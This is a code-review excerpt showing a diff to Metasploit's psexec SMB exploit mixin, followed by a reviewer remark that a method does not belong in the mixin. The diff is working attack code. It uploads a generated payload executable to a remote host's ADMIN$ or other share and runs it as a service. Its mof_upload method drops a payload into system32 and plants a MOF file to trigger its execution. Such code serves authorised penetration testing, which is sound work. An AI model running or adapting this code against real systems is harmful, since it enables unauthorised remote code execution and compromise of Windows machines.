lib/msf/core/exploit/smb/client/psexec.rb

```diff
@@ -193,6 +194,284 @@ def psexec(command, disconnect=true)
+      simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
+      fd = smb_open("\\#{fileprefix}\\#{filename}", 'rwct')
+    else
+      subfolder = false
+      simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
+      fd = smb_open("\\#{filename}", 'rwct')
+    end
+    exe = ''
+    opts = { :servicename => servicename, :serviceencoder => serviceencoder}
+    begin
+      exe = generate_payload_exe_service(opts)
+
+      fd << exe
+    ensure
+      fd.close
+    end
+
+    if subfolder
+      print_status("Created \\#{fileprefix}\\#{filename}...")
+    else
+      print_status("Created \\#{filename}...")
+    end
+
+    # Disconnect from the share
+    simple.disconnect("\\\\#{datastore['RHOST']}\\#{smbshare}")
+
+    # define the file location
+    if datastore['SHARE'] == 'ADMIN$'
+      file_location = "%SYSTEMROOT%\\#{filename}"
+    elsif datastore['SHARE'] =~ /^[a-zA-Z]\$$/
+      file_location = datastore['SHARE'].slice(0,1) +  ":\\#{filename}"
+    else
+      file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}"
+    end
+
+    psexec(file_location, false)
 
+    unless datastore['SERVICE_PERSIST']
+      print_status("Deleting \\#{filename}...")
+      #This is not really useful but will prevent double \\ on the wire :)
+      if datastore['SHARE'] =~ /.[\\\/]/
+        simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
+        begin
+          simple.delete("\\#{fileprefix}\\#{filename}")
+        rescue XCEPT::ErrorCode => e
+          print_error("Delete of \\#{fileprefix}\\#{filename} failed: #{e.message}")
+        end
+      else
+        simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
+        begin
+          simple.delete("\\#{filename}")
+        rescue XCEPT::ErrorCode => e
+          print_error("Delete of \\#{filename} failed: #{e.message}")
+        end
+      end
+    end
+  end
+
+  def mof_upload
+    share = "\\\\#{datastore['RHOST']}\\ADMIN$"
+    filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
+
+    # payload as exe
+    print_status("Trying wbemexec...")
+    print_status("Uploading Payload...")
+    if datastore['SHARE'] != 'ADMIN$'
+      print_error('Wbem will only work with ADMIN$ share')
+      return
+    end
+    simple.connect(share)
+    exe = generate_payload_exe
+    fd = smb_open("\\system32\\#{filename}", 'rwct')
+    fd << exe
+    fd.close
+    print_status("Created %SystemRoot%\\system32\\#{filename}")
+
+    # mof to cause execution of above
+    mofname = rand_text_alphanumeric(14) + ".MOF"
+    mof = generate_mof(mofname, filename)
+    print_status("Uploading MOF...")
+    fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct')
+    fd << mof
+    fd.close
+    print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
+
+    # Disconnect from the ADMIN$
+    simple.disconnect(share)
+  end
+
+  def report_auth
```

Comment:
This method does not belong in the `psexec` mixin.  A mixin should have a defined purpose and only provide methods associated with that purpose.